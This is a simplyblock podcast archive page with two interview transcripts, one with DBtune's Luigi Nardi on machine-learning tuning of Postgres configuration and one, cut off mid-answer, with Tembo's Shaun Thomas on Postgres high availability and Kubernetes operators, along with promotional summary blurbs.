Podcast Archives | simplyblock

Machine Learning driven Database Optimization with Luigi Nardi from DBtune (interview)

Chris Engelbert — Thu, 27 Jun 2024 12:09:00 +0000

Introduction

This interview is part of the simplyblock Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , and our show site .

In this insightful video, we explore the cutting-edge field of machine learning-driven database optimization with Luigi Nardi In this episode of the Cloud Commute podcast.

Key Takeaways

Q: Can machine learning improve database performance? Yes, machine learning can significantly improve database performance. DBtune uses machine learning algorithms to automate the tuning of database parameters, such as CPU, RAM, and disk usage. This not only enhances the efficiency of query execution but also reduces the need for manual intervention, allowing database administrators to focus on more critical tasks. The result is a more responsive and cost-effective database system.

Q: How do machine learning models predict query performance in databases? DBtune employs probabilistic models to predict query performance. These models analyze various metrics, such as CPU usage, memory allocation, and disk activity, to forecast how queries will perform under different conditions. The system then provides recommendations to optimize these parameters, ensuring that the database operates at peak efficiency. This predictive capability is crucial for maintaining performance in dynamic environments.

Q: What are the main challenges in integrating AI-driven optimization with legacy database systems? Integrating AI-driven optimization into legacy systems presents several challenges. Compatibility issues are a primary concern, as older systems may not easily support modern optimization techniques. Additionally, there’s the need to gather sufficient data to train machine learning models effectively. Luigi also mentions the importance of addressing security concerns, especially when sensitive data is involved, and ensuring that the integration process does not disrupt existing workflows.

Q: Can you provide examples of successful AI-driven query optimization in real-world applications? DBtune has successfully applied its technology across various database systems, including Postgres, MySQL, and SAP HANA. For instance, in a project with a major telecom company, DBtune’s optimization algorithms reduced query execution times by up to 80%, leading to significant cost savings and improved system responsiveness. These real-world applications demonstrate the practical benefits of AI-driven query optimization in diverse environments.

undefined

In addition to highlighting the key takeaways, it’s essential to provide deeper context and insights that enrich the listener’s understanding of the episode. By offering this added layer of information, we ensure that when you tune in, you’ll have a clearer grasp of the nuances behind the discussion. This approach enhances your engagement with the content and helps shed light on the reasoning and perspective behind the thoughtful questions posed by our host, Chris Engelbert. Ultimately, this allows for a more immersive and insightful listening experience.

Key Learnings

Q: Can machine learning be used for optimization?

Yes, machine learning can be highly effective in optimizing complex systems by analyzing large datasets and identifying patterns that might not be apparent through traditional methods. It can automatically adjust system configurations, predict resource needs, and streamline operations to enhance performance.

simplyblock Insight: While simplyblock does not directly use machine learning for optimization, it provides advanced infrastructure solutions that are designed to seamlessly integrate with AI-driven tools. This allows organizations to leverage machine learning capabilities within a robust and flexible environment, ensuring that their optimization processes are supported by reliable and scalable infrastructure. Q: How does AI-driven query optimization improve database performance?

AI-driven query optimization improves database performance by analyzing system metrics in real-time and adjusting configurations to enhance data processing speed and efficiency. This leads to faster query execution and better resource utilization.

simplyblock Insight: simplyblock’s platform enhances database performance through efficient storage management and high availability features. By ensuring that storage is optimized and consistently available, simplyblock allows databases to maintain high performance levels, even as AI-driven processes place increasing demands on the system. Q: What are the main challenges in integrating AI-driven optimization with legacy database systems?

Integrating AI-driven optimization with legacy systems can be challenging due to compatibility issues, the complexity of existing configurations, and the risk of disrupting current operations.

simplyblock Insight: simplyblock addresses these challenges by offering flexible deployment options that are compatible with legacy systems. Whether through hyper-converged or disaggregated setups, simplyblock enables seamless integration with existing infrastructure, minimizing the risk of disruption and ensuring that AI-driven optimizations can be effectively implemented. Q: What is the relationship between machine learning and databases?

The relationship between machine learning and databases is integral, as machine learning algorithms rely on large datasets stored in databases to train and improve, while databases benefit from machine learning’s ability to optimize their performance and efficiency.

simplyblock Insight: simplyblock enhances this relationship by providing a scalable and reliable infrastructure that supports large datasets and high-performance demands. This allows databases to efficiently manage the data required for machine learning, ensuring that the training and inference processes are both fast and reliable.

Additional Nugget of Information

Q: How is the rise of vector databases impacting the future of machine learning and databases? The rise of vector databases is revolutionizing how large language models and AI systems operate by enabling more efficient storage and retrieval of vector embeddings. These databases, such as pgvector for Postgres, are becoming essential as AI applications demand more from traditional databases. The trend indicates a future where databases are increasingly specialized to handle the unique demands of AI, which could lead to even greater integration between machine learning and database management systems. This development is likely to play a crucial role in the ongoing evolution of both AI and database technologies.

Conclusion

Luigi Nardi showcases how machine learning is transforming database optimization. As DBtune’s founder, he highlights the power of AI to boost performance, cut costs, and enhance sustainability in database management. The discussion also touches on emerging trends like vector databases and DBaaS, making it a must-listen for anyone keen on the future of database technology. Stay tuned for more videos on cutting-edge technologies and their applications.

Full Episode Transcript

Chris Engelbert: Hello, everyone. Welcome back to this week’s episode of simplyblock’s Cloud Commute podcast. This week I have Luigi with me. Luigi, obviously, from Italy. I don’t think he has anything to do with Super Mario, but he can tell us about that himself. So welcome, Luigi. Sorry for the really bad joke.

Luigi Nardi: Glad to be here, Chris.

Chris Engelbert: So maybe you start with introducing yourself. Who are you? We already know where you’re from, but I’m not sure if you’re actually residing in Italy. So maybe just tell us a little bit about you.

Luigi Nardi: Sure. Yes, I’m originally Italian. I left the country to explore and study abroad a little while ago. So in 2006, I moved to France and studied there for a little while. I spent almost seven years in total in France eventually. I did my PhD program there in Paris and worked in a company as a software engineer as well. Then I moved to the UK for a few years, did a postdoc at Imperial College London in downtown London, and then moved to the US. So I lived in California, Palo Alto more precisely, for a few years. Then in 2019, I came back to Europe and established my residency in Sweden.

Chris Engelbert: Right. Okay. So you’re in Sweden right now.

Luigi Nardi: That’s correct.

Chris Engelbert: Oh, nice. Nice. How’s the weather? Is it still cold?

Luigi Nardi: It’s great. Everybody thinks that Sweden has very bad weather, but Sweden is a very, very long country. So if you reside in the south, actually, the weather is pretty decent. It doesn’t snow very much.

Chris Engelbert: That is very true. I actually love Stockholm, a very beautiful city. All right. One thing you haven’t mentioned, you’re actually the founder and CEO of DBtune. So you left out the best part guess. Maybe tell us a little bit about DBtune now.

Luigi Nardi: Sure. DBtune is a company that is about four years old now. It’s a spinoff from Stanford University and the commercialization of about a decade of research and development in academia. We were working on the intersection between machine learning and computer systems, specifically the use of machine learning to optimize computer systems. This is an area that in around 2018 or 2019 received a new name, which is MLSys, machine learning and systems. This new area is quite prominent these days, and you can do very beautiful things with the combination of these two pieces. DBtune is specifically focusing on using machine learning to optimize computer systems, particularly in the computer system area. We are optimizing databases, the database management systems more specifically. The idea is that you can automate the process of tuning databases. We are focusing on the optimization of the parameters of the database management systems, the parameters that govern the runtime system. This means the way the disk, the RAM, and the CPU interact with each other. You take the von Neumann model and try to make it as efficient as possible through optimizing the parameters that govern that interaction. By doing that, you automate the process, which means that database engineers and database administrators can focus on other tasks that are equally important or even more important. At the same time, you get great performance, you can reduce your cloud costs as well. If you’re running in the cloud in an efficient way, you can optimize the cloud costs. Additionally, you get a check on your greenops, meaning the sustainability aspect of it. So this is one of the examples I really like of how you can be an engineer and provide quite a big contribution in terms of sustainability as well because you can connect these two things by making your software run more efficiently and then scaling down your operations.

Chris Engelbert: That is true. And it’s, yeah, I’ve never thought about that, but sure. I mean, if I get my queries to run more efficient and use less compute time and compute power, huh, that is actually a good thing. Now I’m feeling much better.

Luigi Nardi: I’m feeling much better too. Since we started talking a little bit more about this, we have a blog post that will be released pretty soon about this very specific topic. I think this connection between making software run efficiently and the downstream effects of that efficiency, both on your cost, infrastructure cost, but also on the efficiency of your operations. It’s often underestimated, I would say.

Chris Engelbert: Yeah, that’s fair. It would be nice if you, when it’s published, just send me over the link and I’m putting it into the show notes because I think that will be really interesting to a lot of people. As he said specifically for developers that would otherwise have a hard time having anything in terms of sustainability. You mentioned database systems, but I think DBtune specifically is focused on Postgres, isn’t it?

Luigi Nardi: Right. Today we are focusing on Postgres. As a proof of concept, though, we have applied similar technology to five different database management systems, including relational and non-relational systems as well. So we were, a little while ago, we wanted to show that this technology can be used across the board. And so we play around with MySQL, with FoundationDB, which is the system behind iCloud, for example, and many of the VMware products. And then we have RocksDB, which is behind your Instagram and Facebook and so on. Facebook, very pressing that open source storage system. And things like SAP HANA as well, we’ve been focusing on that a little bit as well, just as a proof of concept to show that basically the same methodology can apply to very different database management systems in general.

Chris Engelbert: Right. You want to look into Oracle and take a chunk of their money, I guess. But you’re on the right track with SAP HANA. It’s kind of on the same level. So how does that work? I think you have to have some kind of an agent inside of your database. For Postgres, you’re probably using the stats tables, but I guess you’re doing more, right?

Luigi Nardi: Right. This is the idea of, you know, observability and monitoring companies. They mainly focus on gathering all this metrics from the machine and then getting you a very nice visualization on your dashboard. As a user, you would look at these metrics and how they evolve over time, and then they help you guide the next step, which is some sort of manual optimization of your system. We are moving one step forward and we’re trying to use those metrics automatically instead of just giving them back to the user. So we move from a passive monitoring approach to an active approach where the metrics are collected and then the algorithm will help you also to automatically change the configuration of the system in a way that it gets faster over time. And so the metrics that we look at usually are, well, the algorithm itself will gather a number of metrics to help it to improve over time. And this type of metrics are related to, you know, your system usage, you know, CPU memory and disk usage. And other things, for example, latency and throughput as well from your Postgres database management system. So using things like pg_stat_statements, for example, for people that are a little more familiar with Postgres. And by design, we refrain from looking inside your tables or looking specifically at your metadata, at your queries, for example, we refrain from that because it’s easier to basically, you know, deploy our system in a way that it’s not dangerous for your data and for your privacy concerns and things like that.

Chris Engelbert: Right. Okay. And then you send that to a cloud instance that visualizes the data, just the simple stuff, but there’s also machine learning that actually looks at all the collected data and I guess try to find pattern. And how does that work? I mean, you probably have a version of the query parser, the Postgres query parser in the backend to actually make sense of this information, see what the execution plan would be. That is just me guessing. I don’t want to spoil your product.

Luigi Nardi: No, that’s okay. So the agent is open source and it gets installed on your environment. And anyone fluent in Python can read that in probably 20 minutes. So it’s pretty, it’s not massive. It’s not very big. That’s what gets connected with our backend system, which is running in our cloud. And the two things connect and communicate back and forth. The agent reports the metrics and requests what’s the next recommendation from the optimizer that runs in our backend. The optimizer responds with a recommendation, which is then enabled in the system through the agent. And then the agent also starts to measure what’s going on on the machine before reporting these metrics back to the backend. And so this is a feedback loop and the optimizer gets better and better at predicting what’s going on on the other side. So this is based on machine learning technology and specifically probabilistic models, which I think is the interesting part here. By using probabilistic models, the system is able to predict the performance for a new guess, but also predict the uncertainty around that estimate. And that’s, I think, very powerful to be able to combine some sort of prediction, but also how confident you are with respect to that prediction. And those things are important because when you’re optimizing a computer system, of course, you’re running this in production and you want to make sure that this stays safe for the system that is running. You’re changing the system in real time. So you want to make sure that these things are done in a safe way. And these models are built in a way that they can take into account all these unpredictable things that may otherwise book in the engineer system.

Chris Engelbert: Right. And you mentioned earlier that you’re looking at the pg_stat_statements table, can’t come up with the name right now. But that means you’re not looking at the actual data. So the data is secure and it’s not going to be sent to your backend, which I think could be a valid fear from a lot of people like, okay, what is actually being sent, right?

Luigi Nardi: Exactly. So Chris, when we talk with large telcos and big banks, the first thing that they say, what are you doing to my data? So you need to sit down and meet their infosec teams and explain to them that we’re not transferring any of that data. And it’s literally just telemetrics. And those telemetrics usually are not sensitive in terms of privacy and so on. And so usually there is a meeting that happens with their infosec teams, especially for big banks and telcos, where you clarify what is being sent and then they look at the source code because the agent is open source. So you can look at the open source and just realize that nothing sensitive is being sent to the internet.

Chris Engelbert: Right.

Luigi Nardi: And perhaps to add one more element there. So for the most conservative of our clients, we also provide a way to deploy this technology in a completely offline manner. So when everybody’s of course excited about digital transformations and moving to the cloud and so on, we actually went kind of backwards and provided a way of deploying this, which is sending a standalone software that runs in your environment and doesn’t communicate at all to the internet. So we have that as an option as well for our users. And that supports a little harder for us to deploy because we don’t have direct access to that anymore. So it’s easy for us to deploy the cloud-based version. But if you, you know, in some cases, you know, there is not very much you can do that will not allow you to go through the internet. There are companies that don’t buy Salesforce for that reason. So if you don’t buy Salesforce, you probably not buy from anybody else on the planet. So for those scenarios, that’s what we do.

Chris Engelbert: Right. So how does it work afterwards? So the machine learning looks into the data, tries to find patterns, has some optimization or some … Is it only queries or does it also give me like recommendations on how to optimize the Postgres configuration itself? And how does that present those? I guess they’re going to be shown in the UI.

Luigi Nardi: So we’re specifically focusing on that aspect, the optimization of the configuration of Postgres. So that’s our focus. And so the things like, if you’re familiar with Postgres, things like the shared buffers, which is this buffer, which contains the copy of the data from tables from the disk and keep it a local copy on RAM. And that data is useful to keep it warm in RAM, because when you interact with the CPU, then you don’t need to go all the way back to disk. And so if you go all the way back to disk, there is an order of magnitude more like delay and latency and slow down based on that. So you try to keep the data close to where it’s processed. So trying to keep the data in cache as much as possible and share buffer is a form of cache where the cache used in this case is a piece of RAM. And so sizing these shared buffers, for example, is important for performance. And then there are a number of other things similar to that, but slightly different. For example, in Postgres, there is an allocation of a buffer for each query. So each query has a buffer which can be used as an operating memory for the query to be processed. So if you’re doing some sort of like sorting, for example, in the query that small memory is used again. And you want to keep that memory close to the CPU and specifically the workman parameter, for example, is what helps with that specific thing. And so we optimize all this, all these things in a way that the flow of data from disk to the registers of the CPU, it’s very, very smooth and it’s optimized. So we optimize the locality of the data, both spatial and temporal locality if you want to use the technical terms for that.

Chris Engelbert: Right. Okay. So it doesn’t help me specifically with my stupid queries. I still have to find a consultant to fix that or find somebody else in the team.

Luigi Nardi: Yeah, for now, that’s correct. We will probably focus on that in the future. But for now, the way you usually optimize your queries is that you optimize your queries and then if you want to see what’s the actual benefit, you should also optimize your parameters. And so if you want to do it really well, you should optimize your queries, then you go optimize your parameters and go back optimize again your queries, parameters and kind of converge into this process. So now that one of the two is fully automated, you can focus on the queries and, you know, speed up the process of optimizing the queries by a large margin. So to in terms of like benefits, of course, if you optimize your queries, you will write your queries, you can get, you know, two or three order of magnitude performance improvement, which is really, really great. If you optimize the configuration of your system, you can get, you know, an order of magnitude in terms of performance improvement. And that’s, that’s still very, very significant. Despite what many people say, it’s possible to get an order of magnitude improvement in performance. If your system by baseline, it’s fairly, it’s fairly basic, let’s say. And the interesting fact is that by the nature of Postgres, for example, the default configuration of Postgres needs to be pretty conservative because Postgres needs to be able to run on big server machines, but also on smaller machines. So the form factor needs to be taken into account when you define the default configuration of Postgres. And so by that fact, it needs to be pretty conservative. And so what you can observe out there is that this problem is so complex that people don’t really change the default configuration of Postgres when they run on a much bigger instance. And so there is a lot of performance improvement that can be obtained by changing that configuration to a better-suited configuration. And you have the point of doing this through automation and through things like DBtune is that you can then refine the configuration of your system specifically for the specific use case that you have, like your application, your workload, the machine size, and all these things are considered together to give you the best outcome for your use case, which is, I think, the new part, the novelty of this approach, right? Because if you’re doing this through some sort of heuristics, they usually don’t really get to cover all these different things. And there will always be kind of super respect to what you can do with an observability loop, right?

Chris Engelbert: Yeah, and I think you mentioned that a lot of people don’t touch the configuration. I think there is the problem that the Postgres configuration is very complex. A lot of parameters depend on each other. And it’s, I mean, I’m coming from a Java background, and we have the same thing with garbage collectors. Optimizing a garbage collector, for every single algorithm you have like 20 or 30 parameters, all of them depend on each other. Changing one may completely disrupt all the other ones. And I think that is what a lot of people kind of fear away from. And then you Google, and then there’s like the big Postgres community telling you, “No, you really don’t want to change that parameter until you really know what you’re doing,” and you don’t know, so you leave it alone. So in this case, I think something like Dbtune will be or is absolutely amazing.

Luigi Nardi: Exactly. And, you know, if you spend some time on blog posts learning about the Postgres parameters you get that type of feedback and takes a lot of time to learn it in a way that you can feel confident and comfortable in changes in your production system, especially if you’re working in a big corporation. And the idea here is that at DBtune we are partnered with leading Postgres experts as well. Magnus Hagander, for example, we see present of the Postgres Europe organization, for example, it’s been doing this manual tuning for about two decades and we worked very closely with him to be able to really do this in a very safe manner, right. You should basically trust our system to be doing the right thing because it’s engineering a way that incorporates a lot of domain expertise so it’s not just machine learning it’s also about the specific Postgres domain expertise that you need to do this well and safely.

Chris Engelbert: Oh, cool. All right. We’re almost out of time. Last question. What do you think it’s like the next big thing in Postgres and databases, in cloud, in db tuning.

Luigi Nardi: That’s a huge question. So we’ve seen all sorts of things happening recently with, of course, AI stuff but, you know, I think it’s, it’s too simple to talk about that once more I think you guys covered those type of topics a lot. I think what’s interesting is that there is there is a lot that has been done to support those type of models and using for example the rise of vector databases for example, which was I think quite interesting vector databases like for example the extension for Postgres, the pgvector was around for a little while but in last year you really saw a huge adoption and that’s driven by all sort of large language models that use this vector embeddings and that’s I think a trend that will see for a little while. For example, our lead investor 42CAP, they recently invested in another company that does this type of things as well, Qdrant for example, and there are a number of companies that focus on that Milvus and Chroma, Zilliz, you know, there are a number of companies, pg_vectorize as well by the Tembo friends. So this is certainly a trend that will stay and for a fairly long time. In terms of database systems, I am personally very excited about the huge shift left that is happening in the industry. Shift left the meaning all the databases of service, you know, from Azure flexible server Amazon RDS, Google Cloud SQL, those are the big ones, but there are a number of other companies that are doing the same and they’re very interesting ideas, things that are really, you know, shaping that whole area, so I can mention a few for example, Tembo, even EnterpriseDB and so on that there’s so much going on in that space and in some sort, the DBtune is really in that specific direction, right? So helping to automate more and more of what you need to do in a database when you’re operating at database. From a machine learning perspective, and then I will stop that Chris, I think we’re running out of time. From machine learning perspective, I’m really interested in, and that’s something that we’ve been studying for a few years now in my academic team, with my PhD students. The, you know, pushing the boundaries of what we can do in terms of using machine learning for computer systems and specifically when you get computer systems that have hundreds, if not thousands of parameters and variables to be optimized at the same time jointly. And we have recently published a few pieces of work that you can find on my Google Scholar on that specific topic. So it’s a little math-y, you know, it’s a little hard to maybe read them parts, but it’s quite rewarding to see that these new pieces of technology are becoming available to practitioners and people that work on applications as well. So that perhaps the attention will move away at some point from full LLMs to also other areas in machine learning and AI that are also equally interesting in my opinion.

Chris Engelbert: Perfect. That’s, that’s beautiful. Just send me the link. I’m happy to put it into the show note. I bet there’s quite a few people that would be really, really into reading those things. I’m not big on mathematics that’s probably way over my head, but that’s, that’s fine. Yeah, I was that was a pleasure. Thank you for being here. And I hope we. Yeah, I hope we see each other somewhere at a Postgres conference we just briefly talked about that before the recording started. So yeah, thank you for being here. And for the audience, I see you, I hear you next week or you hear me next week with the next episode. And thank you for being here as well.

Luigi Nardi: Awesome for the audience will be at the Postgres Switzerland conference as sponsors and we will be giving talks there so if you come by, feel free to say hi, and we can grab coffee together. Thank you very much.

Chris Engelbert: Perfect. Yes. Thank you. Bye bye.

The post Machine Learning driven Database Optimization with Luigi Nardi from DBtune (interview) appeared first on simplyblock.

How I designed PostgreSQL High Availability with Shaun Thomas from Tembo (video + interview)

Chris Engelbert — Thu, 20 Jun 2024 12:08:26 +0000

This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.

In this installment, we’re talking to Shaun Thomas (Twitter/X , personal blog), affectionately known as “Mr. High Availability” in the Postgres community, to discuss his journey from a standard DBA to a leading expert in high availability solutions for Postgres databases. Shaun shares his experiences working in financial services, where he redefined high availability using tools like Pacemaker and DRBD, and the path that led him to authoring a comprehensive book on the subject. Shaun also talks about his current work at Tembo, an organization dedicated to advancing open-source Postgres, and their innovative approaches to high availability, including the use of Kubernetes and containerized deployments.

Chris Engelbert: Hello, welcome back to this week’s episode of simplyblock’s Cloud Commute podcast. This week I have – no, I’m not saying that. I’m not saying I have another incredible guest, even though I have. He’s already shaking his head. Nah, I’m not incredible. He’s just known as Mr. High Availability in the Postgres space for a very specific reason. I bet he’ll talk about that in a second.

So hello, Shaun. Shaun Thomas, thank you for being here. And maybe just introduce yourself real quick. Who are you? Well, where are you from? How did you become Mr. High Availability?

Shaun Thomas: Yeah, so glad to be here. Kind of hang out with you. We talked a little bit. It’s kind of fun. My background is I was just a standard DBA, kind of working on programming stuff at a company I was at and our DBA quit, so I kind of had to pick it up to make sure we kept going. And that was back in the Oracle days. So I just kind of read a bunch of Oracle books to kind of get ready for it. And then they had some layoffs, so our whole division got cut. And then my next job was as a DBA. And I just kind of latched onto it from there.

And as far as how I got into high availability and where I kind of made that my calling card was around 2010, I started working for a company that was in financial services. And they had to keep their systems online at all times because every second they were down, they were losing millions of dollars.

So they actually already had a high availability stack, but it was using a bunch of proprietary tools. So when I started working there, I basically reworked everything. We ended up using the standard stack at the time, which was Pacemaker with Corosync and DRBD for distributed replicating block device because we didn’t really trust replication back then; it was still too new.

We were also running Enterprise DB at the time, so there were a bunch of beta features they had kind of pushed into 9.2 at the time, I think. Because of that whole process and not really having any kind of guide to follow, since there were not a lot of high availability tools back in 2010, 2011, I basically wrote up our stack and the process I used. I presented it at the second Postgres Open that was in Chicago. I did a live demo of the entire stack, and that video is probably online somewhere. My slides, I think, are also on the Postgres Wiki. But after that, I was approached by Packt, the publisher. They wanted me to write a book on it. So I did. I did it mainly because I didn’t have a book to follow. Somebody else in this position really needs to have some kind of series or a book or some kind of step-by-step thing because high availability in Postgres is really important. You don’t want your database to go down in a lot of situations. Until there’s a lot more tools out there to cover your bases, being able to do it is important. Now there’s tons of tools for it, so it’s not a big problem. But back then, man, oof.

Chris Engelbert: Yeah, yeah. I mean, you just mentioned Pacemaker. I’m not sure when I heard that thing the last time. Is that even still a thing?

Shaun Thomas: There’s still a couple of companies using it. Yeah, you would be surprised. I think DFW does in a couple of spots.

Chris Engelbert: All right. I haven’t heard about that in at least a decade, I think. Everything I’ve worked with had different– or let’s say other tools, not different tools. Wow. Yeah, cool. So you wrote that book. And you said you came from an Oracle world, right? So how did the transition to Postgres happen? Was that a choice?

Shaun Thomas: For me, it wasn’t really much of a transition because, like I said, our DBA quit at the company I was at. And it was right before a bunch of layoffs that took out that entire division. But at the time, I was like, ooh, Oracle. I should learn all this stuff. So the company just had a bunch of old training materials lying around. And there were like three or four of the huge Oracle books lying around. So I spent the next three or four weeks just reading all of them back to back.

I was testing in a cluster that we had available, and I set the local version up on my computer just to see if it worked and to learn all the stuff I was trying to understand at the time. But then the layoffs hit, so I was like, what do I do now?

I got another job at a company that needed a DBA. And that was MySQL and Postgres. But that was back when Postgres was still 6.5. Back when it crashed if you looked at it funny. So I got kind of mad at it. And I basically stopped using it from like 2005 to 2010. Or no, that was, sorry, from 2001 to 2005. From 2005, I switched to a company that they were all Postgres. So I got the purple Postgres book. The one that everyone used back then was I think it was 8.1 or 8.2. And then I revised their entire stack also because they were having problems with vacuum. Because back then, the settings were all wrong. So you would end up loading yourself out of your disk space. I ended up vacuuming their systems down from I think it was 20 gigs down to like 5. And back then, that was a lot of disk space.

Chris Engelbert: I was just about to say that in 2005, 20 gigabytes of disk space was a lot.

Shaun Thomas: But back then, the problem with vacuum was you actually had to set the size of the free space map. And the default was way too small. So what would happen is vacuum would actually only keep track of the last 200,000 unused reusable rows by default. But by default, it only kept track of the first 200,000.

So if you had more than that, even if you were vacuuming constantly, it would still bloat like a little bit every day until your whole disk was used. So I actually had to clean all that up or their system was going to crash. They were days away from going down when I joined. They had already added all the disks they could. And back then, you couldn’t just add virtual disk space.

Chris Engelbert: I know those situations, not in the Postgres or database space, but in the software development space where– same thing, I literally joined days before it all would fall apart. Let’s say those are not the best days to join.

Shaun Thomas: Hey, that’s why they hired you, right?

Chris Engelbert: Exactly. All right. So let’s talk a little bit about these days. Right now, you’re with Tembo. And you just have this very nice blog post that blew up on Hacker News for all the wrong reasons.

Shaun Thomas: Well, I mean, we created it for all the right reasons. And so let me just start on Tembo a little bit. So Tembo is like they are all in on Postgres. We are ridiculously all in. Basically, everything we do is all open sourced. You can go to Tembo.io on GitHub. And basically, our entire stack is there. And we even just released our on-prem. So you can actually use our stack on your local system and basically have a Kubernetes cloud management thing for all the clusters you want to manage. And it’ll just be our stack of tools. And the main calling card of Tembo is probably our– if you go to trunk, I think it’s called PGT.dev . We just keep track of a bunch of extensions. And it’s got a command line tool to install them, kind of like a PGXN. And we’re so kind of into this that we actually hired the guy who basically maintained PGXN, David Wheeler. Because we were like, we need to kind of hit the extension drum. And we’re very glad he’s re-standardizing PGXN 2. He’s starting a whole initiative. And he’s got a lot of buy-in from tons of different committers and devs and people who are really pushing it. Maybe we’ll create the gold standard of extension networks. Because the idea is to get it all so that it’s packaged, right? Kind of like a Debian or an RPM or whatever package system you want to use. It’ll just install the package on your Postgres wherever it is. Like the source install, if it’s like a package install, or if it’s something with on your Mac, whatever.

So he’s working on that really. And he’s done some demos that are very impressive. And it looks like it’ll actually be a great advancement. But Tembo is – it’s all about open source Postgres. And our tools kind of show that. Like if you’ve ever heard of Adam Hendel, he goes by Chuck. But if you heard of PGMQ or PG Vectorize, which kind of makes PG Vector a little easier to use, those tools are all coming from us, basically. So we’re putting our money where our mouth is, right?

All right. That’s why I joined him. Because I kept seeing them pop up on Twitter. And I’m like, man, these guys really– they’re really dedicated to this whole thing.

Chris Engelbert: Yeah, cool. So back to PG and high availability. Why would I need that? I mean, I know. But maybe just give the audience a little bit of a clue.

Shaun Thomas: So high availability– and I kind of implied this when I was talking about the financial company, right? The whole idea is to make sure Postgres never goes down. But there’s so much more to it. I’ve done conferences. And I’ve done webinars. And I’ve done trainings. And I’ve done the book. Just covering that topic is it’s essentially an infinite font of just all the different ways you can do it, all the different prerequisites you need to fulfill, all the different things you need to set up to make it work properly. But the whole point is keep your Postgres up. But you also have to define what that means. Where do you put your Postgres instances? Where do you put your replicas? How do you get to them? Do you need an intermediate abstraction layer so that you can connect to that? And it’ll kind of decide where to send you afterwards so you don’t have any outages as far as routing is concerned?

It’s a very deep topic. And it’s easy to get wrong. And a lot of the tools out there, they don’t necessarily get it wrong. But they expect the user to get it right. One of the reasons my book did so well in certain circles is because if you want to set up EFM or repmgr or Patroni or some other tool, you have to follow very closely and know how the tool works extremely well. You have to be very familiar with the documentation. You can’t just follow step by step and then expect it to work in a lot of cases.

Now, there’s a lot of edge cases you have to account for. You have to know why and the theories behind the high availability and how it works a certain way to really deploy it properly.

So even as a consultant when I was working at EDB and a second quadrant, it’s easy to give a stack to a customer and they can implement it with your recommendations. And you can even set it up for them. There’s always some kind of edge case that you didn’t think of.

So the issue with Postgres, in kind of my opinion, is it gives you a lot of tools to build it yourself, but it expects you to build it yourself. And even the other stack tools, like I had mentioned earlier, like repmgr or EFM or Patroni, those are pg auto_failover, another one that came out recently. They work, but you’ve got to install them. And you really do need access to an expert that can come in if something goes wrong. Because if something goes wrong, you’re kind of on your own in a lot of ways.

Postgres doesn’t really have an inherent integral way of managing itself as a cluster. It’s more of like a database that just happens to be able to talk to other nodes to keep them up to date with sync and whatnot. So it’s important, but it’s also hard to do right.

Chris Engelbert: I think you mentioned one important thing. It is important to upfront define your goals. How much uptime do you really need? Because one thing that not only with Postgres, but in general, whenever we talk about failure tolerance systems, high availability, all those kinds of things, what a lot of people seem to forget is that high availability or fault tolerance is a trade-off between how much time and money do I invest and how much money do I lose if something really, well, you could say, s***t hits the fan, right?

Shaun Thomas: Exactly. And that’s the thing. Companies like the financial company I worked at, they took high availability to a fault. They had two systems in their main data center and two more in their disaster recovery data center, all fully synced and up to date. They maintained daily backups on local systems, with copies sent to another system locally holding seven days’ worth. Additionally, backups were sent to tape, which was then sent to Glacier for seven years as per SEC rules.

So, someone could come into our systems and maliciously erase everything, and we’d be back up in an hour. It was very resilient, a result of our design and the amount of money we dedicated toward it because that was a very expensive deployment. That’s atleast 10 servers right there.

Chris Engelbert: But then, when you say you could be back up in an hour, the question is, how much money do you lose in that hour?

Shaun Thomas: Well, like I said, that scenario is like someone walking in and literally smashing all the servers. We’d have to rebuild everything from scratch. In most cases, we’d be up – and this is where your RTO and RPO come in, the recovery time objective and your recovery point objective. Basically, how much do you want to spend to say I want to be down for one minute or less? Or if I am down for that one minute, how much data will I lose? Because the amount of money you spend or the amount of resources you dedicate toward that thing will determine the end result of how much data you might lose or how much money you’ll need to spend to ensure you’re down for less than a minute.

Chris Engelbert: Exactly, that kind of thing. I think that becomes more important in the cloud age. So perfect bridge to cloud, Postgres and cloud, perfect. You said setting up HA is complicated because you have to install the tools, you have to configure them. These days, when you go and deploy Postgres on something like Kubernetes, you would have an operator claiming at least doing all the magic for you. What is your opinion on the magic?

Shaun Thomas: Yeah, so my opinion on that is it evolved a lot. Back when I first started seeing containerized systems like Docker and that kind of thing, my opinion was, I don’t know if I’d run a production system in a container, right? Because it just seems a little shady. But that was 10 years ago or more. Now that Kubernetes tools and that kind of thing have matured a lot, what you get out of this now is you get a level of automation that just is not possible using pretty much anything else. And I think what really sold it to me was – so you may have heard of Gabriele Bartolini. He basically heads up the team that writes and maintains Cloud Native Postgres, the Cloud Native PG operator. We’ll talk about operators probably a bit later. But the point of that was back when—and 2ndQuadrant was before they were bought by EDB—we were selling our BDR tool for bi-directional application for Postgres, right? So multi-master. And we needed a way to put that in a Cloud service for obvious purposes so we could sell it to customers. And that meant we needed an operator. Well, before Cloud Native Postgres existed, there was the BDR operator that we were cycling internally for customers.

And one day while we were in Italy—because every employee who worked at 2ndQuadrant got sent to Italy for a couple of weeks to get oriented with the team, that kind of thing. During that time when I was there in 2020, I think I was there for February, for the first two weeks of February. He demoed that, and it kind of blew me away. We were using other tools to deploy containers. And it was basically Ansible to automate the deployment with Terraform. And then you kind of set everything up and then deploy everything. It takes minutes to set up all the packages and get everything deployed and reconfigure everything. Then you have to wait for syncs and whatnot to make sure everything’s proper.

On someone’s laptop, they set up Kubernetes Docker deployment. Kind, I think we were using at that point, Kubernetes in Docker. And in less than a minute, he had on his laptop set up a full Kubernetes cluster of three replicating, bidirectional replicating, so three multi-master nodes of Postgres on his laptop in less than a minute. And I was just like, my mind was blown. And the thing is, basically, it’s a new concept. The data is what matters. The nodes themselves are completely unimportant. And that’s why, to kind of bring this back around, when Cloud Native Postgres was released by Enterprise DB kind of as an open-source tool for Postgres and not the bidirectional replication stuff for just Postgres.

The reason that was important was because it’s an ethos. The point is your compute nodes—throw them away. They don’t matter. If one goes down, you provision a new one. If you need to upgrade your tooling or the packages, you throw away the old container image, you bring up a new one. The important part is your data. And as long as your data is on your persistent volume claim or whatever you provision that as, the container itself, the version of Postgres you’re running, those aren’t nearly as important. So it complicates debugging to a certain extent. And we can kind of talk about that maybe later. But the important part is it brings high availability to a level that can’t really be described using the old methods. Because the old method was you create two or three replicas. And if one goes down, you’ve got a monitoring system that switches over to one of the alternates. And then the other one might come back or might not. And then you rebuild it if it does, that kind of thing.

